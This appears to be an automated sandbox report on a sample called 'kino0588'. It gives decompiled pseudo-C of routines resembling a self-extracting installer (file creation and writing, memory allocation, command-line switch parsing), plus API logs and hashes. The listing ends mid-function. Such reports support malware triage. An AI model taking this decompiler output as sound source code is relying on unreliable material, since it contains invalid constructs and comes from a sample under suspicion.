Opcode Fuzzy Hash: 094c7338199078d3a74f693a513f08ff59b545ee6af7ab15d28e9e02442076b5
Instruction Fuzzy Hash: A7F06D7260120ABBAB24EFA4CC499BB77ECEB04640B44056BA815D2070EB30D914DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B8487A Relevance: 3.1, APIs: 2, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00B8487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E00B8490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}

0x00b84880
0x00b8488c
0x00b84894
0x00b848a0
0x00b848c9
0x00b848ce
0x00b848a2
0x00b848a8
0x00b848b7
0x00b848bc
0x00b848aa
0x00b848ac
0x00b848ac
0x00b848a8
0x00b848de
0x00b848e7
0x00b8490b
0x00b848ee
0x00b848f0
0x00000000
0x00b84902

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00B84A23,?,00B84F67,*MEMCAB,00008000,00000180), ref: 00B848DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00B84F67,*MEMCAB,00008000,00000180), ref: 00B84902

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 010d6958ab739c144354c53135d3d9cabe1a4b2a9ccedb04937c8a2d81ca5765
Instruction ID: 720ee02091636e1d877d90443a4888c1bf37c3b1a3aaf81a0c6ae7e1413ba694
Opcode Fuzzy Hash: 010d6958ab739c144354c53135d3d9cabe1a4b2a9ccedb04937c8a2d81ca5765
Instruction Fuzzy Hash: 0C0146A3E125712AF324A0298C89FB7559CCB96734F1B0375FDAAE72E2D6644C04C3E0

Uniqueness

Uniqueness Score: -1.00%

Function 00B84AD0 Relevance: 3.0, APIs: 2, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00B84AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0xb8858c; // 0xa4
				_t9 = E00B83680(_t20);
				if( *0xb891d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0xb88d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0xb89400; // 0x56200
							_t15 = _t14 + _t25;
							 *0xb89400 = _t15;
							if( *0xb88184 != 0) {
								_t21 =  *0xb88584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xb893f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}

0x00b84ad5
0x00b84adb
0x00b84ae7
0x00b84aee
0x00b84b05
0x00b84b0d
0x00b84b14
0x00b84b1a
0x00b84b1c
0x00b84b21
0x00b84b2a
0x00b84b2f
0x00b84b31
0x00b84b39
0x00b84b54
0x00b84b54
0x00b84b39
0x00b84b2f
0x00b84b0f
0x00b84b0f
0x00b84b0f
0x00b84b5e
0x00b84ae9
0x00b84aed
0x00b84aed

APIs

Part of subcall function 00B83680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00B8369F
Part of subcall function 00B83680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00B836B2
Part of subcall function 00B83680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00B836DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00B84B05

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: bd6a2581cd4318e69201bee926d9405039b7f429f9a97ec7f98d0db5e7a2aed9
Instruction ID: 87f640cd839d95609717b04953d1e5881108a44e6636d11ffc5be63e072b3303
Opcode Fuzzy Hash: bd6a2581cd4318e69201bee926d9405039b7f429f9a97ec7f98d0db5e7a2aed9
Instruction Fuzzy Hash: 8A01B531240302ABDB14AF58EC45BA27799F744725F098265FA39A72F1CF70D811CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B8658A Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B8658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0xb88b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0xb88b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E00B816B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}

0x00b86592
0x00b86594
0x00b86596
0x00b86598
0x00b86598
0x00b8659b
0x00b8659b
0x00b8659d
0x00b8659e
0x00b865a2
0x00b865a4
0x00b865a9
0x00b865b2
0x00b865b6
0x00b865ba
0x00b865c3
0x00b865c5
0x00b865c8
0x00b865c8
0x00b865c3
0x00b865c9
0x00b865cc
0x00b865d2
0x00b865d1
0x00b865d1
0x00000000
0x00b865dc
0x00000000

APIs

CharPrevA.USER32(00B88B3E,00B88B3F,00000001,00B88B3E,-00000003,?,00B860EC,00B81140,?), ref: 00B865BA

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 31765a04550452cfe306cfaab2e3c6a9e9f4d5afcbac546059d1808a9a7e3cec
Instruction ID: 3f24839eedc35385f3aabfbba4f0f74f0116db5b97485c03afd964f3bd4e5164
Opcode Fuzzy Hash: 31765a04550452cfe306cfaab2e3c6a9e9f4d5afcbac546059d1808a9a7e3cec
Instruction Fuzzy Hash: E4F04C321042549BD331291D98C4BE6BFDEDBA6350F2801EEE8DAC3225DA658C46C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B8621E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00B8621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0xb88004; // 0xfbc33aab
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E00B8597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E00B844B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0xb89124 = E00B86285();
					_t9 = 0;
				}
				return E00B86CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}

0x00b86229
0x00b86230
0x00b86247
0x00b8626a
0x00b86272
0x00b86249
0x00b86255
0x00b8625f
0x00b86264
0x00b86264
0x00b86284

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00B8623F

Part of subcall function 00B844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00B84518
Part of subcall function 00B844B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00B84554

Part of subcall function 00B86285: GetLastError.KERNEL32(00B85BBC), ref: 00B86285

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: 2e93b4a9f21d95550254f8d478f71986575145e7a40bd415d63716ebe0a9b5ae
Instruction ID: 53ff2af20e49d2bdc41ea95cb092c03c7bf41fa389b5ab4e0d42d00b8f4bd171
Opcode Fuzzy Hash: 2e93b4a9f21d95550254f8d478f71986575145e7a40bd415d63716ebe0a9b5ae
Instruction Fuzzy Hash: D6F0BEB0604208ABEB60FF748D46BBA33ECDB54300F4000EAA986DB1A1EE749944CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B84B60 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B84B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0xb88d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0xb88d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0xb88d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0xb88d60)) = 1;
				 *((intOrPtr*)(_t15 + 0xb88d68)) = 0;
				 *((intOrPtr*)(_t15 + 0xb88d70)) = 0;
				 *((intOrPtr*)(_t15 + 0xb88d6c)) = 0;
				return 0;
			}

0x00b84b66
0x00b84b74
0x00b84b98
0x00b84ba0
0x00000000
0x00b84bac
0x00b84ba4
0x00000000
0x00b84ba4
0x00b84b78
0x00b84b7e
0x00b84b84
0x00b84b8a
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00B84FA1,00000000), ref: 00B84B98

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 71ce9369fa46cf3f303bf601e4607ec9019438eae50be28367f91c1bcc3a6034
Instruction ID: 2a9488fb5d72528a92ee1f7bf69a350bb3c4821abe788bb5e61df3cfef23afa2
Opcode Fuzzy Hash: 71ce9369fa46cf3f303bf601e4607ec9019438eae50be28367f91c1bcc3a6034
Instruction Fuzzy Hash: 4CF01C31540B099FC771EF7ACC00652BBE4EAB5B60352093EA46ED21B1EB30A846DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00B866AE Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B866AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}

0x00b866b1
0x00b866ba
0x00b866c7
0x00b866bc
0x00b866be
0x00b866be

APIs

GetFileAttributesA.KERNELBASE(?,00B84777,?,00B84E38,?), ref: 00B866B1

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b5a1d401efd618373970e3a5d91f776629b8d2c871796753422fe9aab66b469b
Instruction ID: 640a4924619dd9ffebf058ba26047112f52c2c5004f9b15e0f9790adb095c0d4
Opcode Fuzzy Hash: b5a1d401efd618373970e3a5d91f776629b8d2c871796753422fe9aab66b469b
Instruction Fuzzy Hash: C6B09276222480826A2016716C295962981F6C123A7E41B91F032C11F0DE3ED846D204

Uniqueness

Uniqueness Score: -1.00%

Function 00B84CA0 Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B84CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}

0x00b84caa
0x00b84cb1

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 00B84CAA

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 501ac50e7d41fe8ad977b61d230f50fd38c01bf2bbee1d139fe306e164583f43
Instruction ID: 7ea14f1e17c46886fcf601700a5ad8e14207c3ad6268a17d92d2e1dc2865ffca
Opcode Fuzzy Hash: 501ac50e7d41fe8ad977b61d230f50fd38c01bf2bbee1d139fe306e164583f43
Instruction Fuzzy Hash: 9AB0123204420CB7DF001FC2EC09F857F1DE7C4761F240001F60C460608E729410C796

Uniqueness

Uniqueness Score: -1.00%

Function 00B84CC0 Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B84CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}

0x00b84cc8
0x00b84ccf

APIs

GlobalFree.KERNELBASE ref: 00B84CC8

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 2d2076d89bbb7204fdf3392aef7b0af296f159542d723d00b9f60cb437b0a503
Instruction ID: 4b54d1f4477ca3fac988e669f42ee212f795f2b2d6328fccf70a4d6ab7fa80e0
Opcode Fuzzy Hash: 2d2076d89bbb7204fdf3392aef7b0af296f159542d723d00b9f60cb437b0a503
Instruction Fuzzy Hash: FDB0123100010CB78F001B42EC088457F1DD6C02607000011F50C461318F339811C685

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B85C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00B85C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0xb88004; // 0xfbc33aab
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00B86CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00B86E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0xb88004; // 0xfbc33aab
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E00B8597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E00B844B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0xb89124 = E00B86285();
									_t75 = 0;
								}
								return E00B86CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E00B844B9(0, 0x521, 0xb81140, 0, 0x40, 0);
												_t85 =  *0xb88588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E00B8667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E00B8667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00B85C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00B81680(0xb88c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E00B8667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E00B8667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0xb88a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00B85C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0xb88b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0xb88a3a;
																}
																E00B81680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E00B8658A(_t218, 0x104, 0xb81140);
																if(E00B831E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0xb88a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0xb88a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0xb88a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0xb88a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0xb88a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0xb89a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0xb89a2c =  *0xb89a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0xb88d48 =  *0xb88d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0xb89a2c =  *0xb89a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0xb89a2c =  *0xb89a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0xb88d48 =  *0xb88d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0xb89a2c =  *0xb89a2c | 0x00000004;
																										L70:
																										 *0xb88a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0xb89a2c = 3;
																	 *0xb88a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0xb88a2c != 0 &&  *0xb88b3e == 0) {
						if(GetModuleFileNameA( *0xb89a3c, 0xb88b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E00B866C8(0xb88b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}

0x00b85c9e
0x00b85ca9
0x00b85cb0
0x00b85cb3
0x00b85cb6
0x00b85cb7
0x00b85cb8
0x00b85cbd
0x00b86204
0x00b85ccb
0x00000000
0x00b85ccb
0x00b85cd3
0x00b85cd7
0x00b85cf4
0x00000000
0x00b85cf4
0x00b85cf8
0x00b85d00
0x00000000
0x00b85d06
0x00b85d06
0x00b85d0e
0x00b85d10
0x00b85d12
0x00b85d14
0x00b85d15
0x00b85d17
0x00b85d49
0x00000000
0x00000000
0x00000000
0x00000000
0x00b85d19
0x00b85d19
0x00b85d1d
0x00000000
0x00b85d3f
0x00b85d3f
0x00b85d4b
0x00b85d4b
0x00b85d4f
0x00b85d8d
0x00000000
0x00b85d93
0x00b85d93
0x00b85d9a
0x00b85d9d
0x00b85d9e
0x00000000
0x00b85d9e
